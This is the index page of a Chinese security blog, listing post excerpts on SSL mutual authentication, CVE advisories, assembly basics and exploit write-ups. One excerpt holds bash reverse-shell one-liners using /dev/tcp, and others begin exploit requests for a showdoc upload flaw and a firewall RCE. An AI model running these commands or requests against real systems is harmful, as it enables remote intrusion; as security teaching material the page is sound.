Hackeye

Look at the world from the eyes of hackers

双向身份认证

双向身份认证

双向身份认证 双向身份认证要求客户端对服务端认证、服务端对客户端认证;目前实现方式大多基于证书来实现双向的身份认证。如SSL的双向身份认证、UKey等。下面主要介绍SSL的双向身份认证。 SSL双向身份认证 在HTTP通信中,涉及两个端,浏览器端和它所访问的站点。 在单向SSL身份认证过程中,仅验证一个端点(服务端)的身份。 当您尝试打开网站时,您的浏览器会通过检查网站的SSL证书来验...

Posted by hackeyes on August 6, 2021

VMware vCenter Server 远程代码执行漏洞CVE-2021-21985

VMware vCenter Server 远程代码执行漏洞

漏洞详情 2021年5月25日,VMware 官方发布安全公告,披露了 VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)、VMware vCenter Server 插件权限绕过漏洞(CVE-2021-21986 )。 攻击者可构造恶意请求,通过vCenter中的默认开启的Virtual SAN Health Check插件造成远程代码执行漏洞。...

Posted by hackeyes on June 8, 2021

SolarWinds Network Performance Monitor 安全漏洞CVE-2021-31474

SolarWinds Network Performance Monitor 安全漏洞

漏洞详情 Solarwinds SolarWinds Network Performance Monitor(NPM)是美国SolarWinds(Solarwinds)公司的一款网络性能监视器,它为路由器、虚拟化环境和其他设备提供监控和报告、跟踪up/down状态、实时分析和网络性能统计等功能。 SolarWinds Network Performance Monitor 存在安全漏洞,该...

Posted by hackeyes on May 28, 2021

HTTP协议栈远程代码执行漏洞CVE-2021-31166

HTTP协议栈远程代码执行漏洞

漏洞详情 HTTP协议栈远程代码执行漏洞(CVE-2021-31166),该漏洞存在于HTTP 协议栈 (http.sys) 的处理程序中,未经身份验证的远程攻击者可通过向目标主机发送特制数据包来进行利用,从而在目标系统上以内核身份执行任意代码。 影响范围: Windows Server, version 20H2 (Server Core Installation) Win...

Posted by hackeyes on May 22, 2021

反弹shell命令

反弹shell

1.bash TCP 1 2 3 4 5 6 bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1 exec 5<>/dev/tcp/127.0.0.1/8080;cat <&5 |...

Posted by hackeyes on May 21, 2021

内生安全

读《内生安全:新一代网络安全框架体系与实践》笔记

1.内生安全的理念 内生安全,就是在信息化环境内不断衍生出安全能力,即使网络的边界防御被打穿,系统仍然能够在一定程度上保持健康运行,并保证数据和业务安全。 内生安全要求在信息化环境内部建设安全能力,使生产系统、业务系统自身具有一定的免疫力,而不是完全依赖于系统之外的隔离和防护。内生安全落地实现的保障机制是“三同步”原则,即信息化系统与网络安全系统必须同步规划、同步建设、同步运营。只有把网...

Posted by hackeyes on May 5, 2021

X86汇编基础

汇编基础

32位X86汇编语言 1.寄存器 ​ X86处理器中有8个32位的通用寄存器。由于历史的原因,EAX通常用于计算,ECX通常用于循环变量计数。ESP和EBP有专门用途,ESP指示栈指针(用于指示栈顶位置),而EBP则是基址指针(用于指示子程序或函数调用的基址指针)。如图中所示,EAX、EBX、ECX和EDX的前两个高位字节和后两个低位字节可以独立使用,其中两位低字...

Posted by hackeyes on April 22, 2021

8086汇编指令

汇编指令

数据传输指令 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. 1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. M...

Posted by hackeyes on April 22, 2021

showdoc上传漏洞

上传漏洞

POST数据包: 1 2 3 4 5 6 7 8 9 10 11 12 13 POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Content-Len...

Posted by hackeyes on April 21, 2021

奇安信NS-NGFW 网康防火墙 前台RCE

RCE

访问地址 http://X.X.X.X/directdata/direct/router 请求头(requestHeader) 1 Host: X.X.X.X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12...

Posted by hackeyes on April 17, 2021

FEATURED TAGS
网络攻防 网络安全 code
ABOUT ME

Look at the world from the eyes of hackers

FRIENDS
本站总访问量